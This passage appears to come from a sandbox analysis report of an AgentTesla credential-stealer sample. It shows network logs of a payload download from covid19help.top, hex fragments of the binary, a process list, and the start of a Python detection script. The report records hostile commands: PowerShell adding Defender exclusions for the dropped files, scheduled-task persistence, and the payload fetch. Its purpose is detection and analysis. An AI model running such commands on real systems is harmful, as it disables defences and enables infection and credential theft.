                                                        Apr 18, 2024 10:37:27.122553110 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.122566938 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.122608900 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.124233961 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.124301910 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.124305964 CEST44349163172.67.175.222192.168.2.22
                                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                        Apr 18, 2024 10:37:25.514779091 CEST | 54562 | 53 | 192.168.2.22 | 8.8.8.8
                                                        Apr 18, 2024 10:37:25.623182058 CEST | 53 | 54562 | 8.8.8.8 | 192.168.2.22
                                                        Apr 18, 2024 10:37:36.020222902 CEST | 52917 | 53 | 192.168.2.22 | 8.8.8.8
                                                        Apr 18, 2024 10:37:36.126555920 CEST | 53 | 52917 | 8.8.8.8 | 192.168.2.22
                                                        Apr 18, 2024 10:37:36.128086090 CEST | 52917 | 53 | 192.168.2.22 | 8.8.8.8
                                                        Apr 18, 2024 10:37:36.234421015 CEST | 53 | 52917 | 8.8.8.8 | 192.168.2.22
                                                        Apr 18, 2024 10:37:43.458601952 CEST | 62751 | 53 | 192.168.2.22 | 8.8.8.8
                                                        Apr 18, 2024 10:37:43.563364983 CEST | 53 | 62751 | 8.8.8.8 | 192.168.2.22
                                                        Apr 18, 2024 10:37:43.563774109 CEST | 62751 | 53 | 192.168.2.22 | 8.8.8.8
                                                        Apr 18, 2024 10:37:43.668469906 CEST | 53 | 62751 | 8.8.8.8 | 192.168.2.22
                                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                        Apr 18, 2024 10:37:25.514779091 CEST | 192.168.2.22 | 8.8.8.8 | 0x129 | Standard query (0) | covid19help.top | A (IP address) | IN (0x0001) | false
                                                        Apr 18, 2024 10:37:36.020222902 CEST | 192.168.2.22 | 8.8.8.8 | 0x423b | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
                                                        Apr 18, 2024 10:37:36.128086090 CEST | 192.168.2.22 | 8.8.8.8 | 0x423b | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
                                                        Apr 18, 2024 10:37:43.458601952 CEST | 192.168.2.22 | 8.8.8.8 | 0xec55 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
                                                        Apr 18, 2024 10:37:43.563774109 CEST | 192.168.2.22 | 8.8.8.8 | 0xec55 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
                                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                        Apr 18, 2024 10:37:25.623182058 CEST | 8.8.8.8 | 192.168.2.22 | 0x129 | No error (0) | covid19help.top | | 172.67.175.222 | A (IP address) | IN (0x0001) | false
                                                        Apr 18, 2024 10:37:25.623182058 CEST | 8.8.8.8 | 192.168.2.22 | 0x129 | No error (0) | covid19help.top | | 104.21.83.128 | A (IP address) | IN (0x0001) | false
                                                        Apr 18, 2024 10:37:36.126555920 CEST | 8.8.8.8 | 192.168.2.22 | 0x423b | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
                                                        Apr 18, 2024 10:37:36.126555920 CEST | 8.8.8.8 | 192.168.2.22 | 0x423b | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
                                                        Apr 18, 2024 10:37:36.126555920 CEST | 8.8.8.8 | 192.168.2.22 | 0x423b | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
                                                        Apr 18, 2024 10:37:36.234421015 CEST | 8.8.8.8 | 192.168.2.22 | 0x423b | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
                                                        Apr 18, 2024 10:37:36.234421015 CEST | 8.8.8.8 | 192.168.2.22 | 0x423b | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
                                                        Apr 18, 2024 10:37:36.234421015 CEST | 8.8.8.8 | 192.168.2.22 | 0x423b | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
                                                        Apr 18, 2024 10:37:43.563364983 CEST | 8.8.8.8 | 192.168.2.22 | 0xec55 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
                                                        Apr 18, 2024 10:37:43.563364983 CEST | 8.8.8.8 | 192.168.2.22 | 0xec55 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
                                                        Apr 18, 2024 10:37:43.563364983 CEST | 8.8.8.8 | 192.168.2.22 | 0xec55 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
                                                        Apr 18, 2024 10:37:43.668469906 CEST | 8.8.8.8 | 192.168.2.22 | 0xec55 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
                                                        Apr 18, 2024 10:37:43.668469906 CEST | 8.8.8.8 | 192.168.2.22 | 0xec55 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
                                                        Apr 18, 2024 10:37:43.668469906 CEST | 8.8.8.8 | 192.168.2.22 | 0xec55 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
                                                        • covid19help.top
                                                        • api.ipify.org
                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        0 | 192.168.2.22 | 49163 | 172.67.175.222 | 443 | 2152 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-04-18 08:37:25 UTC | 312 | OUT | GET /xobizx.scr HTTP/1.1
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                        Host: covid19help.top
                                                        Connection: Keep-Alive
                                                        2024-04-18 08:37:26 UTC | 769 | IN | HTTP/1.1 200 OK
                                                        Date: Thu, 18 Apr 2024 08:37:26 GMT
                                                        Content-Type: application/x-silverlight
                                                        Content-Length: 694792
                                                        Connection: close
                                                        Last-Modified: Wed, 17 Apr 2024 22:05:42 GMT
                                                        ETag: "a9a08-616520e3c0a91"
                                                        Accept-Ranges: bytes
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BxbfxI7eB8LUpghC5RRzcSJG16luG1mVFlKAJflrZG5RCTxtccwCkXs1pzJ5u3BwMZ1ap1iyYuIQ5bnprRCXwIKNX%2Bl%2F%2FzfbExlEuQksBMxS2H%2BIU3axr0xbmjjxH5BbpR8%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                        X-Content-Type-Options: nosniff
                                                        Server: cloudflare
                                                        CF-RAY: 87635535dcc2070d-ATL
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-04-18 08:37:26 UTC600INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed 44 20 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 40 0a 00 00 22 00 00 00 00 00 00 0e 5f 0a 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELD f@"_ @ @
                                                        2024-04-18 08:37:26 UTC1369INData Raw: 1a 59 06 61 45 01 00 00 00 05 00 00 00 1e 13 04 2b b7 11 05 1f 64 91 1f 57 59 2b f2 11 05 1f 14 91 13 04 2b a4 02 8c 0b 00 00 1b 03 04 05 6f 64 00 00 0a 06 17 58 0a 20 3a 08 00 00 0b 1f 6c 0c 20 be 02 00 00 07 19 5b 08 59 32 08 18 13 04 38 75 ff ff ff 17 2b f6 2a 1a 13 07 11 07 45 05 00 00 00 07 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 00 00 00 00 d0 47 00 00 06 26 2a 38 79 ff ff ff 00 13 30 04 00 e2 00 00 00 15 00 00 11 7e 30 00 00 04 13 05 7e 0f 00 00 04 13 06 2b 4c 11 04 45 0c 00 00 00 15 00 00 00 1c 00 00 00 37 00 00 00 66 00 00 00 4f 00 00 00 91 00 00 00 00 00 00 00 3a 00 00 00 66 00 00 00 7d 00 00 00 4f 00 00 00 93 00 00 00 d0 48 00 00 06 26 11 05 1f 26 91 20 e4 00 00 00 59 13 04 2b b4 16 0a 17 13 04 2b ad 0e 05 0e 04 61 1f 46 59 06 61 45 01 00
                                                        Data Ascii: YaE+dWY++odX :l [Y28u+*EG&*8y0~0~+LE7fO:f}OH&& Y++aFYaE
                                                        2024-04-18 08:37:26 UTC1369INData Raw: 7a 00 00 00 00 00 00 00 7a 00 00 00 02 7b 24 00 00 04 3a 48 01 00 00 11 04 20 88 00 00 00 91 0d 2b c4 02 7b 26 00 00 04 6f 6f 00 00 0a 39 2d 01 00 00 1a 0d 2b b0 04 6f 70 00 00 0a 17 40 1d 01 00 00 11 04 20 cb 00 00 00 91 1d 5b 0d 2b 97 02 17 7d 24 00 00 04 02 7b 26 00 00 04 02 7b 26 00 00 04 6f 6f 00 00 0a 20 03 00 00 80 28 71 00 00 0a 26 11 05 20 e5 00 00 00 93 20 25 c1 00 00 59 0d 38 60 ff ff ff 02 7b 26 00 00 04 6f 0a 00 00 0a 6f 72 00 00 0a 02 7b 22 00 00 04 6f 21 00 00 06 6f 69 00 00 0a 0a 2b 00 2b 00 1c 13 07 11 07 45 08 00 00 00 07 00 00 00 0f 00 00 00 02 00 00 00 41 00 00 00 02 00 00 00 58 00 00 00 00 00 00 00 20 00 00 00 2b 00 19 13 07 2b d2 12 00 28 6a 00 00 0a 0b 02 7b 22 00 00 04 73 02 00 00 06 07 6f 07 00 00 06 02 7b 26 00 00 04 6f 0a 00 00
                                                        Data Ascii: zz{$:H +{&oo9-+op@ [+}${&{&oo (q& %Y8`{&oor{"o!oi++EAX ++(j{"so{&o
                                                        2024-04-18 08:37:26 UTC1369INData Raw: 0a 74 0f 00 00 02 80 31 00 00 04 2a 00 36 28 0a 00 00 06 2a d0 62 00 00 06 26 2a 00 00 13 30 06 00 6d 00 00 00 1d 00 00 11 7e 30 00 00 04 0c 18 0b 07 45 06 00 00 00 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3a 00 00 00 3a 00 00 00 02 7b 3f 00 00 04 6f 86 00 00 0a 2c 04 16 0b 2b d1 08 1f 14 91 2b f7 02 7b 3f 00 00 04 02 fe 06 63 00 00 06 73 5e 00 00 06 17 8d 07 00 00 01 25 16 03 a2 6f 87 00 00 0a 26 2a 02 7b 3f 00 00 04 03 6f 88 00 00 0a 2a 00 00 00 36 02 28 89 00 00 0a 02 28 72 00 00 06 2a 00 00 13 30 03 00 77 01 00 00 1e 00 00 11 7e 30 00 00 04 13 06 7e 0f 00 00 04 13 07 17 13 05 11 05 45 0c 00 00 00 24 00 00 00 00 00 00 00 f6 00 00 00 7f 00 00 00 ab 00 00 00 7b 00 00 00 22 01 00 00 9f 00 00 00 02 01 00 00 69 00 00 00 bd 00 00 00 67 00 00 00 02 16
                                                        Data Ascii: t1*6(*b&*0m~0E::{?o,++{?cs^%o&*{?o*6((r*0w~0~E${"ig
                                                        2024-04-18 08:37:26 UTC1369INData Raw: 00 04 6f a0 00 00 0a 2d 09 1f 09 13 08 38 e7 fe ff ff 1c 2b f6 02 7b 32 00 00 04 72 17 02 00 70 06 28 9e 00 00 0a 28 a4 00 00 0a 6f 5f 00 00 06 02 7b 42 00 00 04 6f 97 00 00 0a 2c 09 1f 0b 13 08 38 b3 fe ff ff 11 0a 20 ca 00 00 00 91 11 0a 1b 91 59 2b ea 02 02 7b 40 00 00 04 6f 94 00 00 0a 28 69 00 00 06 2a 00 13 30 03 00 cd 00 00 00 1c 00 00 11 7e 0f 00 00 04 0c 7e 30 00 00 04 0d 1d 0b 07 45 09 00 00 00 18 00 00 00 6d 00 00 00 50 00 00 00 35 00 00 00 35 00 00 00 6d 00 00 00 84 00 00 00 00 00 00 00 35 00 00 00 03 28 6d 00 00 0a 2c 0d 08 1f 6c 93 20 b5 01 00 00 59 0b 2b c1 1e 2b fa 02 7b 32 00 00 04 72 25 02 00 70 6f 5f 00 00 06 72 9d 02 00 70 fe 0b 01 00 1e 0b 2b a1 02 7b 33 00 00 04 2c 04 18 0b 2b 95 08 20 3f 02 00 00 93 20 97 1e 00 00 59 2b ee 02 7b 33
                                                        Data Ascii: o-8+{2rp((o_{Bo,8 Y+{@o(i*0~~0EmP55m5(m,l Y++{2r%po_rp+{3,+ ? Y+{3


                                                        Session ID:1
                                                        Source IP:192.168.2.22
                                                        Source Port:49164
                                                        Destination IP:104.26.12.205
                                                        Destination Port:443
                                                        PID:3512
                                                        Process:C:\Users\user\AppData\Roaming\obimohohj75.scr
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-04-18 08:37:36 UTC | 155 | OUT | GET / HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                        Host: api.ipify.org
                                                        Connection: Keep-Alive
                                                        2024-04-18 08:37:36 UTC | 211 | IN | HTTP/1.1 200 OK
                                                        Date: Thu, 18 Apr 2024 08:37:36 GMT
                                                        Content-Type: text/plain
                                                        Content-Length: 12
                                                        Connection: close
                                                        Vary: Origin
                                                        CF-Cache-Status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 876355797eb56732-ATL
                                                        2024-04-18 08:37:36 UTC | 12 | IN | Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 35 32
                                                        Data Ascii: 81.181.57.52


                                                        Session ID:2
                                                        Source IP:192.168.2.22
                                                        Source Port:49165
                                                        Destination IP:104.26.13.205
                                                        Destination Port:443
                                                        PID:3964
                                                        Process:C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-04-18 08:37:44 UTC | 155 | OUT | GET / HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                        Host: api.ipify.org
                                                        Connection: Keep-Alive
                                                        2024-04-18 08:37:44 UTC | 211 | IN | HTTP/1.1 200 OK
                                                        Date: Thu, 18 Apr 2024 08:37:44 GMT
                                                        Content-Type: text/plain
                                                        Content-Length: 12
                                                        Connection: close
                                                        Vary: Origin
                                                        CF-Cache-Status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 876355a82ba9677f-ATL
                                                        2024-04-18 08:37:44 UTC | 12 | IN | Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 35 32
                                                        Data Ascii: 81.181.57.52



                                                        Target ID:0
                                                        Start time:10:37:22
                                                        Start date:18/04/2024
                                                        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                        Imagebase:0x13f950000
                                                        File size:1'423'704 bytes
                                                        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:2
                                                        Start time:10:37:23
                                                        Start date:18/04/2024
                                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                        Imagebase:0x400000
                                                        File size:543'304 bytes
                                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:5
                                                        Start time:10:37:26
                                                        Start date:18/04/2024
                                                        Path:C:\Users\user\AppData\Roaming\obimohohj75.scr
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Roaming\obimohohj75.scr"
                                                        Imagebase:0x1100000
                                                        File size:694'792 bytes
                                                        MD5 hash:A1B496997BE52302CB008BB93FABCFBF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.371692371.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.371692371.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 26%, ReversingLabs
                                                        • Detection: 47%, Virustotal, Browse
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:6
                                                        Start time:10:37:29
                                                        Start date:18/04/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obimohohj75.scr"
                                                        Imagebase:0x1090000
                                                        File size:427'008 bytes
                                                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:8
                                                        Start time:10:37:30
                                                        Start date:18/04/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                                                        Imagebase:0x1090000
                                                        File size:427'008 bytes
                                                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:9
                                                        Start time:10:37:30
                                                        Start date:18/04/2024
                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp786B.tmp"
                                                        Imagebase:0xac0000
                                                        File size:179'712 bytes
                                                        MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:12
                                                        Start time:10:37:32
                                                        Start date:18/04/2024
                                                        Path:C:\Windows\System32\taskeng.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:taskeng.exe {028588F3-95E8-48BE-8F64-19174D00F448} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                                                        Imagebase:0xff6a0000
                                                        File size:464'384 bytes
                                                        MD5 hash:65EA57712340C09B1B0C427B4848AE05
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:13
                                                        Start time:10:37:32
                                                        Start date:18/04/2024
                                                        Path:C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe
                                                        Imagebase:0x8e0000
                                                        File size:694'792 bytes
                                                        MD5 hash:A1B496997BE52302CB008BB93FABCFBF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 26%, ReversingLabs
                                                        • Detection: 47%, Virustotal, Browse
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:14
                                                        Start time:10:37:33
                                                        Start date:18/04/2024
                                                        Path:C:\Users\user\AppData\Roaming\obimohohj75.scr
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Roaming\obimohohj75.scr"
                                                        Imagebase:0x1100000
                                                        File size:694'792 bytes
                                                        MD5 hash:A1B496997BE52302CB008BB93FABCFBF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.625847603.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.625847603.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.626533099.0000000002600000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:15
                                                        Start time:10:37:35
                                                        Start date:18/04/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                                                        Imagebase:0x220000
                                                        File size:427'008 bytes
                                                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:17
                                                        Start time:10:37:35
                                                        Start date:18/04/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                                                        Imagebase:0x220000
                                                        File size:427'008 bytes
                                                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:19
                                                        Start time:10:37:36
                                                        Start date:18/04/2024
                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp8CF4.tmp"
                                                        Imagebase:0xd60000
                                                        File size:179'712 bytes
                                                        MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:21
                                                        Start time:10:37:39
                                                        Start date:18/04/2024
                                                        Path:C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                                                        Imagebase:0x8e0000
                                                        File size:694'792 bytes
                                                        MD5 hash:A1B496997BE52302CB008BB93FABCFBF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:22
                                                        Start time:10:37:40
                                                        Start date:18/04/2024
                                                        Path:C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                                                        Imagebase:0x8e0000
                                                        File size:694'792 bytes
                                                        MD5 hash:A1B496997BE52302CB008BB93FABCFBF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.627290510.00000000022A2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:23
                                                        Start time:10:37:46
                                                        Start date:18/04/2024
                                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                        Imagebase:0x400000
                                                        File size:543'304 bytes
                                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false
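The process list above is the evidence behind several of the signatures in the overview: powershell.exe adding Defender exclusions for the two dropped binaries (Targets 6, 8, 15, 17), schtasks.exe importing a task definition from an XML file in %LocalAppData%\Temp (Targets 9, 19), EQNEDT32.EXE being started alongside Word (Targets 2, 23), and a .scr and an .exe running from %AppData%\Roaming (Targets 5, 13, 14, 21, 22). The following Python is an added example, not Joe Sandbox or sample code, that applies those checks to records constructed from the command lines shown above. The rule names, the ProcRecord structure and the -EncodedCommand decoding are my additions; the command lines in this report are plain text, so the decoder only matters for variants that hide the cmdlet behind -enc, which is what the "Powershell Base64 Encoded MpPreference Cmdlet" Sigma rule targets.

```python
"""Added example (not Joe Sandbox or sample code): detection checks over the
process records listed in this report.  Records are constructed from the
paths and command lines shown above; rule names are my own."""
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class ProcRecord:
    target_id: int
    path: str
    commandline: str


# Constructed from the process list above (Target IDs 0, 2, 5, 6, 8, 9, 12, 13).
RECORDS = [
    ProcRecord(0, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
               r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding'),
    ProcRecord(2, r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
               r'"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding'),
    ProcRecord(5, r"C:\Users\user\AppData\Roaming\obimohohj75.scr",
               r'"C:\Users\user\AppData\Roaming\obimohohj75.scr"'),
    ProcRecord(6, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
               r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference '
               r'-ExclusionPath "C:\Users\user\AppData\Roaming\obimohohj75.scr"'),
    ProcRecord(8, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
               r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference '
               r'-ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"'),
    ProcRecord(9, r"C:\Windows\SysWOW64\schtasks.exe",
               r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" '
               r'/XML "C:\Users\user\AppData\Local\Temp\tmp786B.tmp"'),
    ProcRecord(12, r"C:\Windows\System32\taskeng.exe",
               r"taskeng.exe {028588F3-95E8-48BE-8F64-19174D00F448} "
               r"S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]"),
    ProcRecord(13, r"C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe",
               r"C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"),
]

# powershell.exe accepts -e / -ec / -enc / -EncodedCommand followed by base64(UTF-16LE script).
ENCODED_ARG = re.compile(r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
MP_EXCLUSION = re.compile(r"(?i)\bAdd-MpPreference\b[^|;]*-Exclusion(?:Path|Process|Extension)\b")
EXCLUSION_PATH = re.compile(r'(?i)-ExclusionPath\s+(?:"([^"]+)"|(\S+))')
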